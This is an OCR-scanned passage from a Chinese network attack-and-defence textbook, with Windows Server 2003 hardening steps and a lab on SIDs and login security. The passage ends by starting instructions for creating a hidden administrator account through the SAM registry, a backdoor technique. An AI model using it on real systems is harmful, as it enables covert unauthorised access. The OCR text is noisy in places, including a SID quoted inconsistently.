Protocol Security, Internet 协议 安全 ) 。 

(4) 路 由 及 远程 访问 .RADIUS 服务 器 ,Direct Access 与 网 络 访问 保护 (NAP) 。 

(5) Н ##. NAT (Network Address Translate, 网 络 地 址 转换 ) 与 VPN (Virtual 
Private Networks ,虚拟 专用 网 ) 。 

(6) QoS(Quality of Service ,服务 质量 ) 。 
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(7) Windows 防火 墙 IEEE 802. 1X 无 线 网 络 、 远 程 桌面 \Windows 部 署 服务 。 
(8) IIS 网 站 、SSL 网 站 、FTP 服务 器 .SSL FTP 服务 器 。 

(9) Windows Server Update Services(WSUS) 。 

(10) 网 络 负载 均衡 (Network Load Balancing) 5 Web Farm, 


2.6.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 在 熟悉 Windows 操作 系统 安全 架构 的 基础 上 ,针对 Windows 
Server 操作 系统 的 配置 ,掌握 Windows 服务 器 的 安全 配置 方法 。 

2. 实验 条 件 

在 本 实验 中 ,用 一 台 运 行 Windows Server 2003 的 计算 机 作为 服务 器 ,在 该 服务 器 上 进 
行 相关 安全 策略 的 配置 。 同 时 ,最 好 还 有 一 台 运 行 Windows XP 及 以 上 版 本 操作 系统 的 客 
户 端 计算 机 ,用 于 实验 的 测试 。 
2.6.3 实验 过 程 

步骤 1: 以 账号 Administrator 身份 登录 Windows Server 2003 操作 系统 。 

步骤 2: 给 Guest 账户 设置 复杂 的 密码 并 禁用 。 选 中 “我 的 电脑 ”并 右 击 ,在 出 现 的 快捷 
菜单 中 选择 “属性 ”选项 ,在 打开 的 对 话 框 中 选择 “管理 ”选项 。 然 后 依次 选择 “计算 机 管理 
(本 地 )”>“ 系 统 工具 ”>“ 本 地 用 户 和 组 ”>“ 用 户 ” 选 项 ,在 打开 对 话 框 的 右 侧 列表 中 选中 
Guest 账号 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “设置 密码 ”选项 ,如 图 2-36 所 示 。 


旦 计算 机 管理 
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图 2-36 重 置 密码 
为 了 保险 起 见 , 最 好 给 Guest 设置 一 个 复杂 的 密码 。 读 者 可 以 打开 记事 本 ,在 里 面 输入 


一 串 包 含 特殊 字符 数字、 字母 的 长 字符 串 , 然 后 把 它 作为 Guest 用 户 的 密码 复制 进去 ,如 
图 2-37 所 示 。 给 Guest 设置 了 一 个 复杂 的 密码 后 单 击 “ 确 定 ? 按 钮 ,系统 提示 密码 设置 





60 网 络 攻 击 与 防御 实 训 





成 功 。 

步骤 3: 禁用 Guest 账户 。 选 中 Guest 账户 后 右 击 , 在 出 现 的 快捷 菜单 中 选择 “属性 ” 选 
项 ,在 打开 的 如 图 2-38 所 示 的 对 话 框 中 同时 选中 “用 户 不 能 更 改 密码 ”密码 永 不 过 期 "和 
“账户 已 禁用 ” 复 选 框 。 





图 2-37 输入 新 密码 图 2-38 禁用 Guest 账户 的 设置 


此 时 可 以 看 到 Guest 账户 已 经 被 禁用 ,如 图 2-39 所 示 。 


+ 算 机 管理 
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图 2-39 显示 Guest 账户 已 经 禁用 


步骤 4: 将 系统 Administrator 账号 重 命名 。Windows Server 2003 的 Administrator 用 
户 是 不 能 被 停 用 的 ,这 意味 着 攻击 者 可 以 一 遍 一 遍地 尝试 这 个 用 户 的 密码 。 出 于 安全 考虑 ， 
尽量 把 该 账户 伪装 成 普通 用 户 , 如 重 命名 为 DCST。 具 体 方法 为 : 选中 Administrator 账户 
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并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “ 重 命 名 ”选项 ,用 DCST 代替 Administrator 即 可 。 此 时 
Administrator 超级 管理 员 已 经 重 命名 为 DCST, 如 图 2-40 所 示 。 


旦 计算 机 管理 
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图 2-40 将 Administrator 重 命名 为 DCST 


步骤 5: 创建 一 个 陷阱 用 户 。 所 谓 陷阱 用 户 , 就 是 创建 一 个 名 称 为 Administrator 的 本 
地 用 户 ,把 该 用 户 账户 的 权限 设置 成 最 低 , 并 设置 一 个 非常 复杂 的 密码 。 这 样 就 可 以 使 攻击 
者 即使 耗费 再 长 的 时 间 ,也 很 难 获得 真正 的 管理 员 账 户 和 密码 ,而 且 通 过 这 种 方法 ,可 以 发 
现 攻击 者 的 人 侵 企图 。 具 体 方法 为 : 在 用户 ?列表 的 空白 处 右 击 , 在 出 现 的 快捷 菜单 中 选 


择 “ 新 用 户 ” 选 项 ,在 “新 用 户 ” 对 话 框 中 新 建 一 个 名 称 为 Administrator 的 用 户 ,并 给 
Administrator 设置 一 个 非常 复杂 的 密码 ,然后 单 击 “ 创 建 " 按 钮 即 可 ,如 图 2-41 所 示 。 


Еа 





В 2-41 新 建 一 个 名 称 为 Administrator 的 普通 账户 并 设置 复杂 的 密码 


需要 说 明 的 是 ,为 了 防止 账户 的 重 名 ,在 创建 以 Administrator 用 户 名 称 为 陷阱 用 户 之 
前 ,需要 对 原来 系统 中 默认 创建 的 Administrator 管理 员 账 户 进行 重 命名 操作 。 
此 时 在 用 户 列表 中 可 以 看 到 新 建 的 普通 用 户 Administrator, 如 图 2-42 所 示 。 
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图 2-42 显示 新 创建 的 普通 账户 Administrator 


然后 在 新 建 的 Administrator 账户 上 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,在 打 
开 的 如 图 2-43 所 示 的 对 话 框 中 ,可 看 到 此 用 户 隶 属于 Users 普通 用 户 权 限 。 








2-43 显示 Administrator 隶属 于 Users 普通 用 户 权限 


步骤 6: 密码 安全 设置 。 一 些 公司 的 管理 员 创建 账号 时 往往 用 公司 名 、 计 算 机 名 作为 用 
户 名 ,然后 又 把 这 些 用 户 的 密码 设置 的 非常 简单 ,如 “welcome”“123456” 等 。 为 了 加 强 对 用 
户 账户 的 安全 管理 ,不 仅 需要 注意 密码 的 复杂 性 ,还 需要 经 常 更 换 密码 。 

首先 选择 “开始 ”>“ 管 理工 具 ”>“ 本 地 安全 设置 "选项 ,进入 “本 地 安全 策略 ”设置 窗口 。 
然后 选择 “账户 策略 ”> “密码 策略 ”选项 ,在 打开 的 如 图 2-44 所 示 的 窗口 中 进行 密码 策略 设 
置 。 其 中 ,系统 默认 禁用 了 “密码 必须 符合 复杂 性 要 求 ”功能 , 带 来 了 安全 隐患 。 
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图 2-44 密码 策略 设置 


选择 “密码 必须 符合 复杂 性 要 求 ”选项 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,在 
打开 的 如 图 2-45 所 示 的 对 话 框 中 选中 “已 启用 ” 单 选 按钮 即 可 。 


EF ER 尾 性 





图 2-45 启用 密码 必须 符合 复杂 性 要 求 功能 


同时 ,密码 长 度 最 小 值 "系统 默认 为 0 个 字符 , 即 没有 进行 限制 ,这 是 很 不 安全 的 。 可 
在 选取 该 项 后 右 击 , 在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,在 出 现 的 如 图 2-46 所 示 的 对 话 
框 中 根据 需要 选择 合适 的 密码 字符 个 数 ,如 设置 为 “10? 个 字符 。 密 码 字符 个 数 越 多 ,攻击 者 
进行 暴力 破解 的 难度 也 就 越 大 。 

步 又 7: 开启 系统 审核 功能 。 每 当 用 户 执行 了 指定 的 某 些 操 作 ,审核 日 志 就 会 记录 一 个 
审核 项 。 管 理 员 可 以 审核 操作 中 的 成 功 尝 试 和 失败 尝试 。 安 全 审核 对 于 服务 器 操作 系统 来 
说 极其 重要 ,因为 通过 审核 日 志 可 以 发 现 系 统 中 发 生 了 哪些 违反 安全 的 事件 。 如 果 网 络 中 
发 生 了 针对 操作 系统 的 人 侵 行为 ,正确 的 审核 设置 所 生成 的 审核 日 志 将 包含 有 关 此 次 人 侵 
的 重要 信息 。 
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图 2-46 设置 密码 长 度 值 


选择 “本 地 策略 ”~"* 审 核 策略 ?选项 ,在 右 侧 列表 中 可 以 根据 安全 管理 需要 对 重要 事项 
进行 审核 ,如 图 2-47 Bros ,建议 将 所 有 事件 都 设置 为 进行 “成 功 ” 审 核 。 


成 功 
成 功 
成 功 
成 功 
成 功 
成 功 
成 功 
成 功 








图 2-47 对 重要 事项 进行 审核 


步骤 8: 用 户 权 限 分 配 。 选 择 “ 本 地 策略 ”>“ 用 户 权限 分 配 ” 选 项 ,在 右 侧 列表 中 选择 “ 通 
过 终端 服务 器 拒绝 登录 ”选项 ,如 图 2-48 Br zs ,删除 系统 默认 的 设置 ,只 添加 Administrators 
组 ,使 该 组 中 的 用 户 账户 能 够 利用 终端 服务 器 登录 。 
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图 2-48 ”选择 “通过 终端 服务 器 拒绝 登录 ”选项 


选择 “通过 终端 服务 拒绝 登录 ”选项 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,打开 
“通过 终端 服务 拒绝 登录 属性 ”对 话 框 ,如 图 2-49 所 示 。 

选择 ASPNET 选项 , 单 击 “ 删 除 ” 按 钮 ,将 ASPNET 组 从 通过 终端 服务 拒绝 登录 的 组 
中 删除 。 然 后 单 击 “ 添 加 用 户 或 组 ”按钮 ,打开 * 选 择 用 户 或 组 ”对话 框 ,如 图 2-50 所 示 。 





ЖЯ РАН 





В 2-49 “通过 终端 服务 拒绝 登录 属性 "对 话 框 图 2-50 “选择 用 户 或 组 "对话 框 


单 击 “ 高 级 ”按钮 ,在 出 现 的 对 话 框 中 单 击 “ 立 即 查 找 ” 按 钮 ,在 “搜索 结果 ”列表 框 中 将 显 
示 所 有 的 用 户 和 组 ,如 图 2-51 所 示 。 

双击 Administrator, 即 将 该 组 添加 到 通过 终端 服务 拒绝 登录 的 组 中 ,如 图 2-52 所 示 。 

单 击 “ 确 定 ” 按 钮 ,此 时 显示 Administrator 已 经 加 入 该 组 ,如 图 2-53 所 示 。 
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Hi 2-53 Administrator 已 经 加 入 “通过 终端 服务 拒绝 登录 ”组 中 
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步骤 9. 修改 注册 表 , 防 止 ICMP 重 定向 报 文 的 攻击 。 选 择 * 开 始 ” 一 “运行 ?选项 ,随后 
输入 “regedit” 命 令 , 在 打开 的 “注册 表 编 辑 器 ”对话 框 中 定位 到 HKEY_LOCAL_MACHINEN 
SYSTEM\CurrentControlSet\Tcpip\Parameters, 如 图 2-54 所 示 。 


m. 
g 
е 
= 
> 
Ld 
© 
* 
= 
9 
° 


DDDDDDDDDD 





图 2-54 “注册 表 编 辑 器 "对话 框 


选择 EnableICMPRedirects 选项 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “修改 ”选项 ,在 打开 
的 “编辑 DWORD 值 ” 对 话 框 中 选中 “十 六 进 制 " 单 选 按钮 ,并 将 “数值 数据 ”设置 为 “0”, 然 后 
单 击 “ 确 定 ” 按 钮 ,如 图 2-55 所 示 。 

步骤 10; 修改 注册 表 , 禁 止 IPC 空 连接 。 攻 击 者 可 以 利用 net use 命令 建立 空 连接 , 进 
而 实施 入 侵 , 还 有 net view .nbtstat 等 工具 也 是 基于 空 连 接 的 。 因 此 ,IPC 空 连接 存在 很 大 
的 安全 问题 ,一 般 需要 禁止 。 首 先 在 “注册 表 编 辑 器 ”中 定位 到 Local_Machine\System\ 
CurrentControlSet\Control\LSA 下 的 restrictanonymous 选项 ,将 该 项 的 十 六 进 制 数值 改 
成 "1" 即 可 ,如 图 2-56 所 示 。 


FLELTES a xl 


Pewitemmms ооо 


gs DWORD {Йй 


EE 
[ we ] mw | 


图 2-55 “编辑 DWORD 值 " 对 话 框 图 2-56 ”将 restrictanonymous 的 十 六 进 制 数值 改 成 1 





步骤 11: 删除 服务 器 共享 。 服 务 器 共享 虽然 提供 了 资源 共享 时 的 便利 ,但 却 带 来 了 安 
全 威胁 ,对 于 服务 器 来 说 ,出 于 安全 考虑 ,应 该 将 其 删除 。 可 以 在 “命令 提示 符 ” 下 分 别 运行 
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以 下 命令 来 完成 ,如 图 2-57 所 示 。 


net share с$ /del 
net share d$ /del 
net share admin $ /del 





JI 1985-2083 Microsoft Corp. 


and Settings Mdninistrator?net share c$ /del 


and Settings Wdninistrator)net share d$ ¿del 


and Settings Widministrator?net share adnin$ ¿del 


C: Documents and Settings Widninistrator?, 





图 2-57 删除 服务 器 共享 


步骤 12: HS 站 点 设置 。 对 于 提供 Web 服务 的 Windows Server 服务 器 ,需要 通过 安全 
设置 加 强 对 服务 器 的 安全 管理 。 选 择 * 开 始 ” 一 “管理 工具 ”-~“*Internet 信息 服务 管理 ”一 
“网 站 ?选项 ,在 打开 的 “Internet 信息 服务 (JIS) 管 理 器 ?对 话 框 中 ,显示 了 该 服务 器 上 已 经 发 
布 的 网 站 名 称 , 如 图 2-58 所 示 
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В 2-58 "Internet 信息 服务 (IIS) 管 理 器 "对话 框 


需要 注意 的 是 ,在 发 布 网 站 时 ,网 站 所 在 的 文件 一 定 不 要 存放 在 系统 盘 (C: ) 下 ,要 将 网 
站 目录 数据 和 系统 盘 分 开 ,建议 将 网 站 目录 和 数据 存放 在 单独 的 磁盘 空间 中 。 
时 ,在 IS 管理 器 中 删除 没有 用 到 的 映射 , 仅 保留 asp、aspx、html、htm 等 映射 即 可 。 
具体 可 在 选择 “默认 网 站 ?后 右 击 , 在 出 现 的 快捷 菜单 中 选择 “文档 ?选项 ,在 打开 的 如 图 2-59 


= 
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所 示 的 对 话 框 中 进行 删除 。 

在 IIS 管理 器 中 ,可 以 将 “HTTP404 Object Not Found” 出 错 页 面 通过 URL 重 定向 到 
一 个 定制 HTM 文件。 具体 方法 为 : 选择 “默认 网 站 ?并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “ 属 
性 ”选项 ,在 出 现 的 对 话 框 中 选择 “ 自 定义 错误 ”选项 ,在 打开 的 对 话 框 中 选取 *404” 错 误 页 面 
的 位 置 ,如 图 2-60 所 示 。 


应 用 程序 配 轩 





图 2-59 删除 没有 用 到 的 映射 图 2-60 选取 “404” 错 误 页 面 的 位 置 


单 击 “ 编 辑 ” 按 钮 ,在 打开 的 如 图 2-61 所 示 
的 对 话 框 中 单 击 “浏览 ”按钮 ,选取 新 的 404 错误 
页 面 文件 。 可 在 服务 器 任意 位 置 编写 一 个 


a assaka 
JE 13. MEHEUT ЖИЙИ ИЛЕ. PN 
# VIS 管理 器 中 可 以 将 应 用 程序 陋 离 到 应 用 各 аана 





序 池 。 应 用 程序 池 是 包含 一 个 或 多 个 URL 的 
一 个 组 ,由 一 个 工作 进程 或 一 组 工作 进程 对 应 图 2-61 选取 新 的 404 错误 页 面 文件 

用 程序 池 提供 服务 。 因 为 每 个 应 用 程序 都 独立 

于 其 他 应 用 程序 运行 ,所 以 使 用 应 用 程序 池 可 以 提高 Web 服务 器 的 可 靠 性 和 安全 性 。 在 
Windows 操作 系统 上 运行 进程 的 每 个 应 用 程序 都 有 一 个 进程 标识 ,以 确定 此 进程 如 何 访问 
系统 资源 。 每 个 应 用 程序 池 也 有 一 个 进程 标识 ,此 标识 是 一 个 以 应 用 程序 需要 的 最 低 权 限 
运行 的 账户 ,可 以 允许 使 用 此 进程 标识 匿名 访问 相应 的 网 站 或 应 用 程序 。 

首先 创建 应 用 程序 池 。 双 击 “Internet 信息 服务 (IIS) 管 理 器 ”, 选 择 * 应 用 程序 池 ? 选 项 
并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “新 建 ”>“ 应 用 程序 池 ” 选 项 ,如 图 2-62 所 示 。 

在 打开 的 “添加 新 应 用 程序 池 ” 对 话 框 中 ,为 应 用 程序 池 输 入 一 个 新 ID, 如 输入 
testAppPool。 在 “应 用 程序 池 设 置 ?选项 区 域 中 ,选中 * 对 新 的 应 用 程序 池 使 用 默认 设置 单 
选 按 钮 ,然后 单 击 “确定 ”按钮 ,如 图 2-63 所 示 。 

接着 ,将 网 站 或 应 用 程序 分 配 到 应 用 程序 池 中 。 双 击 “Internet 信息 服务 (IIS) 管 理 器 ”， 
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图 2-62 新 建 应 用 程序 池 


选取 用 户 想 要 分 配 到 该 应 用 程序 池 中 的 网 站 或 应 用 程序 (本 实验 以 “默认 网 站 ”为 例 ) ,然后 
在 其 上 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,在 打开 的 对 话 框 中 选择 “ 主 目录 ”选项 
卡 , 打 开 如 图 2-64 所 示 的 对 话 框 。 在 “应 用 程序 池 ” 下 拉 列 表 框 中 选择 需要 的 网 站 或 应 用 程 
序 名 称 (本 实验 使 用 前 面 创建 的 testAppPool) ,确定 需要 指定 的 网 站 或 应 用 程序 名 称 , 然 后 
单 击 “ 确 定 "按钮 即 可 。 


ЕТЕШ 
k: 








图 2-63 添加 新 应 用 程序 池 В 2-64 设置 应 用 程序 池 对 应 的 网 站 或 应 用 程序 名 称 


2.6.4 任务 与 思考 
服务 器 是 互联 网 应 用 中 提供 大 量 可 共享 资源 的 基础 设施 ,其 安全 性 决定 应 用 的 安全 性 
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和 可 靠 性 。 提 高 服务 器 的 安全 可 以 通过 以 下 方法 进行 相应 的 安全 设置 。 

1. 及 时 安装 系统 补丁 

不 论 是 Windows 还 是 Linux, 抑 或 是 各 类 数据 库 和 应 用 软件 ,都 有 可 能 存在 漏洞 。 为 
存在 漏洞 的 软件 及 时 安装 补丁 避免 漏洞 被 蓄意 攻击 利用 是 服务 器 安全 最 重要 的 保障 之 一 。 

2. 安装 和 设置 防火 墙 

现在 有 许多 基于 硬件 或 软件 的 防火 墙 ,很 多 安全 厂商 也 都 推出 了 相关 的 产品 。 对 服务 
器 安全 而 言 ,安装 防火 墙 非常 必要 。 防 火 墙 对 于 非法 访问 具有 很 好 的 预防 作用 ,但 是 安装 了 
防火 墙 并 不 意味 着 安全 得 到 了 保障 。 在 安装 防火 墙 之 后 ,用 户 需 要 根据 自身 的 网 络 环境 ,对 
防火 墙 进行 适当 的 配置 以 达到 最 好 的 防护 效果 。 

3. 安装 网 络 杀毒 软件 

现在 网 络 上 的 计算 机 病毒 ,木马 .蠕虫 等 恶意 代码 非常 猩 镍 ,这 就 需要 在 网 络 服务 器 上 
安装 相应 版 本 的 杀毒 软件 控制 病毒 等 恶意 代码 的 传播 。 同 时 ,在 网 络 杀毒 软件 的 使 用 过 程 
中 ,必须 及 时 升级 且 每 天 自动 更 新 病毒 库 。 

4. 关闭 不 需要 的 服务 和 端口 

服务 器 操作 系统 在 安装 时 ,会 启动 一 些 不 需要 的 服务 ,不 仅 会 占用 系统 的 资源 ,而 且 会 
增加 系统 的 安全 隐患 。 对 于 一 段 时 间 内 完全 不 会 用 到 的 端口 ,可 以 全 部 将 其 关闭 。 

5. 定期 对 服务 器 进行 备份 

为 了 防止 无 法 预料 的 系统 故障 或 用 户 不 小 心 的 非法 操作 ,必须 对 系统 进行 安全 备份 。 
除了 对 全 系统 进行 周期 性 (如 两 个 月 一 次 ) 的 备份 外 ,还 应 该 将 重要 系统 文件 存放 在 不 同 服 
务 器 上 ,以 便 在 系统 出 现 崩溃 时 (通常 是 硬盘 出 错 ) ,可 以 及 时 地 将 系统 恢复 到 正常 状态 。 
6. 账号 和 密码 保护 
账号 和 密码 保护 可 以 说 是 服务 器 系统 的 第 一 道 防线 ,目前 网 络 上 大 部 分 对 服务 器 系统 
的 攻击 都 是 从 截获 或 猜测 密码 开始 的 。 一 旦 攻击 者 进入 系统 ,那么 前 面 的 防范 措施 几乎 就 
失去 了 作用 ,所 以 对 服务 器 系统 管理 员 的 账号 和 密码 进行 保护 是 保证 系统 安全 非常 重要 的 
措施 。 

7. 监测 系统 日 志 

通过 运行 系统 日 志 程 序 , 系 统 会 记录 下 所 有 用 户 使 用 系统 的 情形 ,包括 最 近 登 录 时 间 、 
使 用 的 账号 、 进 行 的 活动 等 。 日 志 程序 会 定期 生成 报表 ,通过 对 报表 进行 分 析 , 系 统管 理 员 
可 以 知道 是 否 有 异常 现象 发 生 , 以 便 采取 必要 的 安全 防护 措施 。 








2.7 Windows 登录 安全 的 实现 


2.7.1 预备 知识 : 登录 安全 介绍 


当 用 户 通过 各 类 互联 网 终端 进行 网 络 支 付 等 操作 时 ,首先 要 执行 登录 指定 的 系统 ,其 目 
的 是 对 用 户 身份 的 合法 性 进行 验证 。 在 登录 过 程 中 ,系统 要 求 用 户 输入 账号 名 称 、 密 码 及 用 
户 的 身份 证 号 码 等 信息 ,之 后 再 由 客户 端 软 件 与 服务 器 端 进行 通信 ,通过 信息 交换 完成 用 户 
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的 身份 认证 过 程 。 在 这 一 过 程 中 ,一 旦 用 户 的 登录 过 程 被 攻击 者 监视 或 劫持 ,通信 数据 被 截 
获 或 破解 ,将 会 产生 严重 的 安全 问题 。 

1. 认证 过 程 中 存在 的 安全 隐患 

根据 对 各 类 安全 事件 的 综合 分 析 , 目前 较为 严重 的 安全 隐患 主要 有 两 个 方面 : 由 加 密 
机 制 的 不 健全 引起 的 安全 问题 和 由 服务 器 证 书 验证 产生 的 安全 问题 。 

CD 加 密 机 制 安全 问题 。 加 密 机 制 安全 问题 是 指 因 加 密 算 法 或 方法 不 完整 或 过 于 简 
单 ,而 被 攻击 者 支持 和 破解 。 数 据 加 密 既 是 信息 安全 中 采用 最 为 广泛 的 一 种 方法 ,也 是 其 他 
安全 技术 的 基础 和 保障 。 目 前 ,银行 客户 端 等 安全 应 用 的 登录 加 密 机 制 一 般 采 用 HTTPS 
和 “HTTP 十 数据 加 密 ” 两 种 方式 。 其 中 ,大 部 分 安全 客户 端 采 用 目前 互联 网 通用 的 
HTTPS 加 密 机 制 ,但 也 有 部 分 安全 客户 端 采 用 “HTTP 十 数据 加 密 ” 机 制 。 

(2) 服务 器 证 书 验 证 安全 问题 。 服 务 器 证 书 验 证 存在 的 安全 问题 主要 集中 在 当 客 户 端 
登录 服务 器 时 ,在 通信 过 程 中 不 对 服务 器 端 身份 的 合法 性 进行 验证 ,从 而 导致 登录 过 程 容易 
被 “中 间 人 ”攻击 劫持 。 这 样 的 安全 问题 构成 的 威胁 较为 严重 ,因为 在 日 常 应 用 中 , 绝 大 多 数 
情况 是 由 服务 器 认证 客户 端 身份 的 合法 性 ,也 就 是 说 在 这 个 认证 系统 中 ,实现 认证 功能 的 服 
务 器 被 认为 是 绝对 可 靠 的 。 但 是 ,在 实际 应 用 中 ,如 果实 现 身 份 认证 的 服务 器 不 可 靠 或 是 虚 
假 的 ,那么 整个 认证 系统 将 会 出 现 混乱 。 

2. SID 


SID(Security Identifiers ,安全 标识 符 ) 是 Windows Server 操作 系统 中 用 于 标识 用 户 、 
组 和 计算 机 账户 的 唯一 号 码 。 在 第 一 次 创建 用 户 ,组 和 计算 机 账户 时 ,将 给 网 络 上 的 每 一 个 
账户 发 布 一 个 唯一 的 SID。Windows Server 中 的 内 部 进程 将 引用 账户 的 SID 而 不 是 账户 
的 用 户 或 组 名 。 如 果 创 建 了 一 个 账户 后 马上 将 其 删除 ,然后 使 用 相同 的 用 户 名 创建 另 一 个 
账户 , 则 新 账户 将 不 具有 授权 给 前 一 个 账户 的 权力 或 权限 ,原因 是 该 账户 具有 不 同 的 SID 
号 码 。 

用 户 通过 验证 后 ,登录 进程 会 给 用 户 一 个 访问 令 牌 ,该 令 牌 相当 于 用 户 访问 系统 资源 的 
票证 , 当 用 户 试图 访问 系统 资源 时 ,将 访问 令 牌 提供 给 Windows Server, 然 后 Windows 
Server 检查 用 户 试图 访问 对 象 上 的 访问 控制 列表 。 如 果 用 户 被 允许 访问 该 对 象 , Windows 
Server 将 会 分 配给 用 户 适 当 的 访问 权限 。 

访问 令 牌 是 用 户 通 过 验证 时 由 登录 进程 所 提供 的 ,所 以 改变 用 户 的 权限 需要 注销 后 重 
新 登录 ,再 次 获取 访问 令 牌 。 


2.7.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 掌握 Windows Server 2003 环境 下 用 户 的 登录 及 身份 认证 过 程 (其 
他 版 本 的 Windows Server 操作 系统 与 此 类 似 ) ,理解 SID 访问 令 牌 、 SAM 的 含义 ,掌握 查 
看 用 户 SID 的 方法 和 创建 一 个 具有 管理 员 权 限 的 隐藏 账户 的 方法 。 


2. 实验 条 件 
本 实验 可 以 运行 在 有 Windows Server 2003 或 其 他 Windows Server 版 本 的 计算 机 上 ， 
该 计算 机 既 可 以 是 一 台 物 理 机 ,也 可 以 是 一 台 虚 拟 机 。 
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2.7.3 实验 过 程 


本 实验 可 以 分 为 以 下 几 个 组 成 部 分 。 

1. 查看 管理 员 用 户 的 SID 

可 以 使 用 whoami 等 工具 (该 工具 包含 在 Windows Server Resource Kit 中 ) 查 看 与 登 
录 会 话 相 关 的 SID, 具 体 步 又 如 下 。 

步骤 1: 选择 “开始 ”>“ 运 行 ”选项 ,在 出 现 的 “运行 ”对话 框 中 输入 “cmd” 命 令 , 然 后 单 
“确定 ”按钮 ,打开 命令 提示 符 窗口 。 

步骤 2. 在 光标 闪烁 处 输入 *whoami /?” 命 令 ,查看 命令 的 所 有 功能 

步骤 3. 输入 “whoami Vuser” 命令 ,可 查看 用 户 的 SID, 如 图 2-65 所 示 








EH 


:NDocuments and SettingsSñdministrator>whoami /user 


有 acn- otuoxlanipS adnin trator S-1-5-21-3678246790-2846023256-576550818-s00 


C:\Documents and Settings Widministrator) 





图 2-65 查看 用 户 的 SID 


从 图 2-65 中 可 以 看 到 ,输入 “whoami /user” 命 令 后 ,可 以 查看 到 用 户 名 为 Administrator 
用 户 的 SID 为 S-1-5-21-3678246790-28846023256-576550818-500。 其 中 ,可 以 看 到 SID 带 
有 前 级 S, 它 的 各 个 部 分 之 间 用 连 字符 “-” 隔 开 : 第 1 个 数字 (本 实验 中 的 1) 是 修订 版 版 号 ; 
第 2 个 数字 是 标识 符 颁 发 机 构 代 码 ( 对 Windows 2003 来 说 是 固定 的 数字 5); 然后 是 4 个 
子 颁发 机 构 代 码 ( 本 例 中 是 21 和 后 续 的 3 个 长 数字 串 ) 和 一 个 相对 标识 符 (Relative 
IdenTifier,RID, 本 实验 中 是 500), SID 中 的 一 部 分 是 各 系统 或 域 唯一 具有 的 ,而 男 一 部 分 
(RID) 是 跨 所 有 系统 和 域 共 享 的 。 当 然 安装 Windows 2003 时 ,本 地 计算 机 会 颁发 一 个 随机 
的 SID, 比 如 创建 一 个 Windows 2003 域 时 , 它 也 被 指定 一 个 唯一 的 SID。 于 是 对 任何 的 
Windows 2003 计算 机 或 域 来 说 , 子 颁发 机 构 代 码 总 是 唯一 的 (除非 故意 修改 或 复制 ,如 某 些 
底层 的 磁盘 复制 技术 ),RID 对 所 有 的 计算 机 或 域 来 说 都 是 一 个 常数 。 例 如 , 带 有 RID 500 
的 SID 总 是 代表 本 地 计算 机 的 真正 Administrator 账户 ,RID 501 是 Guest 账户 

2. 查看 新 建 用 户 的 SID 

主要 操作 步骤 如 下 。 
步骤 1. 在 命令 提示 符 窗口 的 光标 闪烁 处 输入 “net user Tuser/add” 命 令 ,添加 一 个 新 
用 户 账户 (本 实验 为 Tuser) ,如 图 2-66 所 示 。 
步骤 2: 用 户 新 建成 功 后 :注销 管理 员 账 户 , 以 刚刚 创建 的 Tuser 用 户 的 身份 重新 登录 
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locuments and Settings\hdninistratorynet user Tuser /add 


1NDocuments and Settings Administrator» 





图 2-66 添加 用 户 tuser 


Windows 系统 。 
步骤 3: 重新 打开 命令 提示 符 窗口 ,再 次 输入 "whoami /user” 命 令 , 可 以 看 到 用 户 名 和 
用 户 SID 都 改变 了 ,如 图 2-67 所 示 。 从 图 中 可 以 看 出 ,用 户 Tuser 的 RID 与 Administrator 
的 RID 不同。 在 域 环境 中 ,从 1000 开始 的 RID 代表 用 户 账户 
In oft Міпдомз (7, 
Kc» ТВ 1985-2003 Mic 
:Documents and SettingsNTuser>whoami /user 


用 户 信 


用 户 


— Kk 


Kicn-otuoxlan3pS V $-1-5-21-3678246790-2846023256 


|С: Documents and SettingsNIuser? 





2-67 查看 用 户 tuser 的 SID 


例如 ,在 本 实验 中 RID 是 该 域 中 创建 的 第 9 位 用 户 ,Windows 2003( 或 者 使 用 适当 工具 
的 恶意 攻击 者 ) 总 是 将 具有 RID 500 的 账户 识别 为 管理 员 

3. 创建 一 个 具有 管理 员 权 限 的 隐藏 账户 

在 前 面 的 预备 知识 和 其 他 章节 中 已 经 大 概 介绍 了 SAM 和 SID 的 相关 知识 ,下 面 在 此 
基础 上 由 读者 来 创建 一 个 具有 管理 员 权 限 的 隐藏 账户 。 
步骤 1: 注销 Tuser 用 户 ,以 用 户 Administrator 的 身份 重新 登录 Windows 操作 系统 。 
步骤 2. 在 “运行 ?对话 框 中 输入 “regedit" 命 令 .打开 * 注 册 表 编辑 器 ”对话 框 ,将 对 SAM 
的 权限 设置 为 完全 控制 ,如 图 2-68 所 示 。 
重新 输入 “regedit” 命 令 ,然后 在 HKLM\SAM\SAM\domains\account\ 目 录 下 找到 用 
J: Administrator 和 Tuser, 如 图 2-69 所 示 。 

SAM 数据 库 位 于 注册 表 HKLM\SAM\SAM 下 ,受到 ACL(Access Control List, 访 问 
控制 列表 ) 保 护 , 它 在 硬盘 上 保存 在 “%systemroot%system32\config\” 目 录 下 的 sam 文件 














$23 Windows 操作 系统 攻防 实 训 75 

















图 2-69 注册 表 编 辑 器 窗口 





中 。Windows 活动 目录 域 (或 本 机 ) 中 的 SAM 内 容 存放 在 Domain 中 ,其 下 有 两 个 分 支 , 即 
Account 和 Builtin ,其 中 \Domains\Account 是 用 户 账户 内 容 。 

(D \Domains\ Account\ User 下 是 各 账户 的 信息 ,其 下 的 子 键 是 各 个 账户 的 SID 相对 标 
识 符 , 如 000001F4 是 管理 员 RID。 
© \Domains\Account\Names\ 下 是 用 户 账户 名 ,每 个 账户 名 只 有 一 个 默认 的 子 项 , 子 
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项 中 的 类 型 不 是 一 般 的 注册 表 数 据 类 型 ,而 是 指向 标志 这 个 账户 的 SID 相对 标识 符 。 例 
如 , 子 项 中 的 Administrator, 类 型 为 0x1f4, 于 是 \Dinaubs\Account\Users 中 的 000001F4 
